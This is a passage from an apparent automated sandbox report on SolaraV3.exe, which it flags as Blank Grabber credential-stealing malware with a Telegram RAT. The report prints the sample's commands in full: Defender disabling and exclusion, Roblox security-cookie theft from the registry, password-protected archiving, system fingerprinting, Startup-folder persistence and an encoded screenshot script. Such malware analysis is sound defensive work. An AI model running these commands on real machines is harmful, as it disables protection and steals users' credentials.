reg.exe (PID: 8176 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)

Conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7976 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8184 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 5380 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 7160 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 2324 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 1424 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 5968 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 7616 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 7832 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 7200 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 7052 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7948 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 4544 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7252 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7176 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7640 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7732 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7636 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7592 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7316 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7988 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7284 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 8024 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rar.exe (PID: 7696 cmdline: C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)

cmd.exe (PID: 3724 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 6612 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7196 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7452 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 2564 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 3044 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 4216 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7584 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 8040 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 6924 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000003.1563577276.000001EA23124000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000001.00000003.1563577276.000001EA23122000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.2034413215.000001FC25CB1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: SolaraV3.exe PID: 2884	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: SolaraV3.exe PID: 4892	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: SolaraV3.exe PID: 4892	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SolaraV3.exe PID: 4892	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SolaraV3.exe", ParentImage: C:\Users\user\Desktop\SolaraV3.exe, ParentProcessId: 4892, ParentProcessName: SolaraV3.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'", ProcessId: 1652, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SolaraV3.exe", ParentImage: C:\Users\user\Desktop\SolaraV3.exe, ParentProcessId: 4892, ParentProcessName: SolaraV3.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 1660, ProcessName: cmd.exe

Sigma detected: Rar Usage with Password and Compression Level

Source: Process started

Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SolaraV3.exe", ParentImage: C:\Users\user\Desktop\SolaraV3.exe, ParentProcessId: 4892, ParentProcessName: SolaraV3.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *", ProcessId: 8024, ProcessName: cmd.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\SolaraV3.exe, ProcessId: 4892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuA